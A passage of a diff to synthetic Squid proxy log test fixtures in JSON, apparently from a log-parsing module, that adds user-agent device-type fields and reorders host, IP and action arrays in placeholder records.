"Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90", "user_agent.os.full": "Android 6.0", @@ -3694,6 +3745,7 @@ "url.top_level_domain": "org", "user.name": "odoco", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10" }, @@ -3761,6 +3813,7 @@ "url.top_level_domain": "net", "user.name": "etdol", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "mobmail android 2.1.3.3150" }, @@ -3783,8 +3836,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.net", - "example.com" + "example.com", + "api.example.net" ], "related.ip": [ "10.162.129.196", @@ -3828,6 +3881,7 @@ "url.top_level_domain": "net", "user.name": "identsu", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "mobmail android 2.1.3.3150" }, @@ -3895,6 +3949,7 @@ "url.top_level_domain": "com", "user.name": "enimadm", "user_agent.device.name": "Android", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80", "user_agent.os.full": "Android 5.1.1", @@ -3921,12 +3976,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.com", - "internal.example.net" + "internal.example.net", + "www5.example.com" ], "related.ip": [ - "10.93.159.170", - "10.232.19.43" + "10.232.19.43", + "10.93.159.170" ], "related.user": [ "riame" @@ -3969,6 +4024,7 @@ "url.top_level_domain": "com", "user.name": "riame", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -3995,8 +4051,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.net", - "api.example.net" + "api.example.net", + "example.net" ], "related.ip": [ "10.55.55.72", @@ -4040,6 +4096,7 @@ "url.top_level_domain": "net", "user.name": "asp", "user_agent.device.name": "Samsung SM-S337TL", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 7.0", @@ -4111,6 +4168,7 @@ "url.top_level_domain": "net", "user.name": "ntorever", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -4184,6 +4242,7 @@ "url.top_level_domain": "org", "user.name": "mcorpo", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10" }, @@ -4210,16 +4269,16 @@ "internal.example.org" ], "related.ip": [ - "10.130.150.189", - "10.181.177.74" + "10.181.177.74", + "10.130.150.189" ], "related.user": [ "nvo" ], "rsa.internal.messageid": "LOCK", "rsa.misc.action": [ - "LOCK", - "accept" + "accept", + "LOCK" ], "rsa.misc.content_type": "colabori", "rsa.misc.result_code": "tassita", @@ -4251,6 +4310,7 @@ "url.top_level_domain": "org", "user.name": "nvo", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -4281,8 +4341,8 @@ "api.example.net" ], "related.ip": [ - "10.83.130.95", - "10.76.220.3" + "10.76.220.3", + "10.83.130.95" ], "related.user": [ "userror" @@ -4325,6 +4385,7 @@ "url.top_level_domain": "org", "user.name": "userror", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -4355,16 +4416,16 @@ "www.example.com" ], "related.ip": [ - "10.219.245.58", - "10.166.160.217" + "10.166.160.217", + "10.219.245.58" ], "related.user": [ "radip" ], "rsa.internal.messageid": "COPY", "rsa.misc.action": [ - "COPY", - "deny" + "deny", + "COPY" ], "rsa.misc.content_type": "iameaqu", "rsa.misc.result_code": "Dui", @@ -4396,6 +4457,7 @@ "url.top_level_domain": "com", "user.name": "radip", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -4420,8 +4482,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.com", - "www5.example.org" + "www5.example.org", + "example.com" ], "related.ip": [ "10.183.243.246", @@ -4465,6 +4527,7 @@ "url.top_level_domain": "org", "user.name": "tatio", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", @@ -4491,12 +4554,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www.example.com", - "internal.example.net" + "internal.example.net", + "www.example.com" ], "related.ip": [ - "10.54.5.47", - "10.202.224.209" + "10.202.224.209", + "10.54.5.47" ], "related.user": [ "aturv" @@ -4536,6 +4599,7 @@ "url.top_level_domain": "net", "user.name": "aturv", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -4562,20 +4626,20 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "mail.example.net", - "mail.example.com" + "mail.example.com", + "mail.example.net" ], "related.ip": [ - "10.72.99.69", - "10.170.234.233" + "10.170.234.233", + "10.72.99.69" ], "related.user": [ "uatu" ], "rsa.internal.messageid": "PROPFIND", "rsa.misc.action": [ - "PROPFIND", - "allow" + "allow", + "PROPFIND" ], "rsa.misc.content_type": "uido", "rsa.misc.result_code": "lab", @@ -4607,6 +4671,7 @@ "url.top_level_domain": "net", "user.name": "uatu", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -4633,8 +4698,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.org", - "internal.example.net" + "internal.example.net", + "api.example.org" ], "related.ip": [ "10.245.240.47", @@ -4678,6 +4743,7 @@ "url.top_level_domain": "org", "user.name": "odic", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", @@ -4708,8 +4774,8 @@ "api.example.net" ], "related.ip": [ - "10.61.110.7", - "10.62.188.193" + "10.62.188.193", + "10.61.110.7" ], "related.user": [ "quaU" @@ -4749,6 +4815,7 @@ "url.top_level_domain": "net", "user.name": "quaU", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10" }, @@ -4771,12 +4838,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www.example.net", - "mail.example.net" + "mail.example.net", + "www.example.net" ], "related.ip": [ - "10.68.198.188", - "10.172.139.78" + "10.172.139.78", + "10.68.198.188" ], "related.user": [ "onsectet" @@ -4816,6 +4883,7 @@ "url.top_level_domain": "net", "user.name": "onsectet", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -4856,8 +4924,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "block", - "CONNECT" + "CONNECT", + "block" ], "rsa.misc.content_type": "teturad", "rsa.misc.result_code": "avolu", @@ -4889,6 +4957,7 @@ "url.top_level_domain": "org", "user.name": "midestl", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -4925,8 +4994,8 @@ ], "rsa.internal.messageid": "PURGE", "rsa.misc.action": [ - "PURGE", - "cancel" + "cancel", + "PURGE" ], "rsa.misc.content_type": "laboree", "rsa.misc.result_code": "oll", @@ -4956,6 +5025,7 @@ "url.top_level_domain": "org", "user.name": "deomnisi", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -4982,20 +5052,20 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.com", - "api.example.net" + "api.example.net", + "www5.example.com" ], "related.ip": [ - "10.176.62.146", - "10.255.40.12" + "10.255.40.12", + "10.176.62.146" ], "related.user": [ "oeiusmo" ], "rsa.internal.messageid": "COPY", "rsa.misc.action": [ - "deny", - "COPY" + "COPY", + "deny" ], "rsa.misc.content_type": "tatemac", "rsa.misc.result_code": "emeu", @@ -5027,6 +5097,7 @@ "url.top_level_domain": "net", "user.name": "oeiusmo", "user_agent.device.name": "U20", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90", "user_agent.os.full": "Android 6.0", @@ -5097,6 +5168,7 @@ "url.subdomain": "api", "url.top_level_domain": "org", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -5123,20 +5195,20 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.com", - "example.com" + "example.com", + "www5.example.com" ], "related.ip": [ - "10.1.27.133", - "10.5.49.20" + "10.5.49.20", + "10.1.27.133" ], "related.user": [ "tationu" ], "rsa.internal.messageid": "OPTIONS", "rsa.misc.action": [ - "block", - "OPTIONS" + "OPTIONS", + "block" ], "rsa.misc.content_type": "ntutlab", "rsa.misc.result_code": "olore", @@ -5166,6 +5238,7 @@ "url.top_level_domain": "com", "user.name": "tationu", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -5192,8 +5265,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "internal.example.com", - "www5.example.org" + "www5.example.org", + "internal.example.com" ], "related.ip": [ "10.70.244.155", @@ -5206,8 +5279,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "accept", - "POST" + "POST", + "accept" ], "rsa.misc.content_type": "ons", "rsa.misc.result_code": "temaccus", @@ -5239,6 +5312,7 @@ "url.top_level_domain": "org", "user.name": "caboNemo", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -5277,8 +5351,8 @@ ], "rsa.internal.messageid": "PURGE", "rsa.misc.action": [ - "PURGE", - "accept" + "accept", + "PURGE" ], "rsa.misc.content_type": "uames", "rsa.misc.result_code": "moenimip", @@ -5310,6 +5384,7 @@ "url.top_level_domain": "net", "user.name": "cillumdo", "user_agent.device.name": "Samsung SM-S337TL", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 7.0", @@ -5336,8 +5411,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.net", - "www.example.com" + "www.example.com", + "api.example.net" ], "related.ip": [ "10.74.115.33", @@ -5381,6 +5456,7 @@ "url.top_level_domain": "net", "user.name": "roquisq", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", @@ -5407,12 +5483,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.net", - "mail.example.com" + "mail.example.com", + "api.example.net" ], "related.ip": [ - "10.242.48.203", - "10.191.220.1" + "10.191.220.1", + "10.242.48.203" ], "related.user": [ "isi" @@ -5452,6 +5528,7 @@ "url.top_level_domain": "net", "user.name": "isi", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -5478,8 +5555,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.org", - "internal.example.com" + "internal.example.com", + "www5.example.org" ], "related.ip": [ "10.109.88.27", @@ -5523,6 +5600,7 @@ "url.top_level_domain": "com", "user.name": "aparia", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -5561,8 +5639,8 @@ ], "rsa.internal.messageid": "LOCK", "rsa.misc.action": [ - "deny", - "LOCK" + "LOCK", + "deny" ], "rsa.misc.content_type": "etur", "rsa.misc.result_code": "remeum", @@ -5594,6 +5672,7 @@ "url.top_level_domain": "com", "user.name": "onemul", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -5620,12 +5699,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.com", - "internal.example.org" + "internal.example.org", + "example.com" ], "related.ip": [ - "10.0.0.240", - "10.18.199.203" + "10.18.199.203", + "10.0.0.240" ], "related.user": [ "ittenb" @@ -5665,6 +5744,7 @@ "url.top_level_domain": "org", "user.name": "ittenb", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -5691,8 +5771,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.org", - "www5.example.com" + "www5.example.com", + "www5.example.org" ], "related.ip": [ "10.73.80.251", @@ -5703,8 +5783,8 @@ ], "rsa.internal.messageid": "NONE", "rsa.misc.action": [ - "allow", - "NONE" + "NONE", + "allow" ], "rsa.misc.content_type": "lumquid", "rsa.misc.result_code": "serro", @@ -5736,6 +5816,7 @@ "url.top_level_domain": "com", "user.name": "ercitati", "user_agent.device.name": "Samsung SM-A715F", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]", "user_agent.os.full": "Android 10", @@ -5762,8 +5843,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www.example.net", - "api.example.org" + "api.example.org", + "www.example.net" ], "related.ip": [ "10.22.34.206", @@ -5774,8 +5855,8 @@ ], "rsa.internal.messageid": "PURGE", "rsa.misc.action": [ - "block", - "PURGE" + "PURGE", + "block" ], "rsa.misc.content_type": "velites", "rsa.misc.result_code": "uasiarch", @@ -5807,6 +5888,7 @@ "url.top_level_domain": "net", "user.name": "mve", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", @@ -5837,8 +5919,8 @@ "www.example.net" ], "related.ip": [ - "10.199.103.185", - "10.62.168.226" + "10.62.168.226", + "10.199.103.185" ], "related.user": [ "ipsa" @@ -5880,6 +5962,7 @@ "url.top_level_domain": "net", "user.name": "ipsa", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -5906,8 +5989,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.com", - "www5.example.com" + "www5.example.com", + "example.com" ], "related.ip": [ "10.97.33.56", @@ -5949,6 +6032,7 @@ "url.top_level_domain": "com", "user.name": "ptate", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -5979,8 +6063,8 @@ "www5.example.com" ], "related.ip": [ - "10.49.169.175", - "10.115.154.104" + "10.115.154.104", + "10.49.169.175" ], "related.user": [ "ore" @@ -5990,8 +6074,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "HEAD", - "allow" + "allow", + "HEAD" ], "rsa.misc.content_type": "tatis", "rsa.misc.result_code": "Sedut", @@ -6021,6 +6105,7 @@ "url.top_level_domain": "com", "user.name": "ore", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -6051,8 +6136,8 @@ "internal.example.com" ], "related.ip": [ - "10.213.100.153", - "10.33.112.100" + "10.33.112.100", + "10.213.100.153" ], "related.user": [ "enimad" @@ -6092,6 +6177,7 @@ "url.top_level_domain": "org", "user.name": "enimad", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", @@ -6122,8 +6208,8 @@ "example.net" ], "related.ip": [ - "10.216.143.226", - "10.25.53.93" + "10.25.53.93", + "10.216.143.226" ], "related.user": [ "oremeu" @@ -6132,8 +6218,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "cancel", - "CONNECT" + "CONNECT", + "cancel" ], "rsa.misc.content_type": "urau", "rsa.misc.result_code": "lla", @@ -6165,6 +6251,7 @@ "url.top_level_domain": "net", "user.name": "oremeu", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", @@ -6239,6 +6326,7 @@ "url.top_level_domain": "net", "user.name": "mSecti", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -6265,8 +6353,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.net", - "www5.example.com" + "www5.example.com", + "api.example.net" ], "related.ip": [ "10.60.56.205", @@ -6310,6 +6398,7 @@ "url.top_level_domain": "com", "user.name": "ita", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -6340,16 +6429,16 @@ "www5.example.net" ], "related.ip": [ - "10.245.251.98", - "10.6.11.124" + "10.6.11.124", + "10.245.251.98" ], "related.user": [ "tvolu" ], "rsa.internal.messageid": "DELETE", "rsa.misc.action": [ - "DELETE", - "accept" + "accept", + "DELETE" ], "rsa.misc.content_type": "onsequ", "rsa.misc.result_code": "strud", @@ -6381,6 +6470,7 @@ "url.top_level_domain": "com", "user.name": "tvolu", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -6407,12 +6497,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.org", - "mail.example.org" + "mail.example.org", + "www5.example.org" ], "related.ip": [ - "10.145.25.55", - "10.99.55.115" + "10.99.55.115", + "10.145.25.55" ], "related.user": [ "lumd" @@ -6454,6 +6544,7 @@ "url.top_level_domain": "org", "user.name": "lumd", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -6525,6 +6616,7 @@ "url.top_level_domain": "com", "user.name": "rem", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -6555,8 +6647,8 @@ "example.com" ], "related.ip": [ - "10.252.146.132", - "10.163.9.35" + "10.163.9.35", + "10.252.146.132" ], "related.user": [ "umq" @@ -6565,8 +6657,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "accept", - "CONNECT" + "CONNECT", + "accept" ], "rsa.misc.content_type": "ota", "rsa.misc.result_code": "oremip", @@ -6598,6 +6690,7 @@ "url.top_level_domain": "org", "user.name": "umq", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -6636,8 +6729,8 @@ ], "rsa.internal.messageid": "DELETE", "rsa.misc.action": [ - "DELETE", - "deny" + "deny", + "DELETE" ], "rsa.misc.content_type": "uameiu", "rsa.misc.result_code": "porinc", @@ -6669,6 +6762,7 @@ "url.top_level_domain": "com", "user.name": "upta", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -6699,16 +6793,16 @@ "internal.example.com" ], "related.ip": [ - "10.140.170.171", - "10.73.218.58" + "10.73.218.58", + "10.140.170.171" ], "related.user": [ "tinv" ], "rsa.internal.messageid": "TRACE", "rsa.misc.action": [ - "TRACE", - "block" + "block", + "TRACE" ], "rsa.misc.content_type": "umq", "rsa.misc.result_code": "nse", @@ -6740,6 +6834,7 @@ "url.top_level_domain": "com", "user.name": "tinv", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome 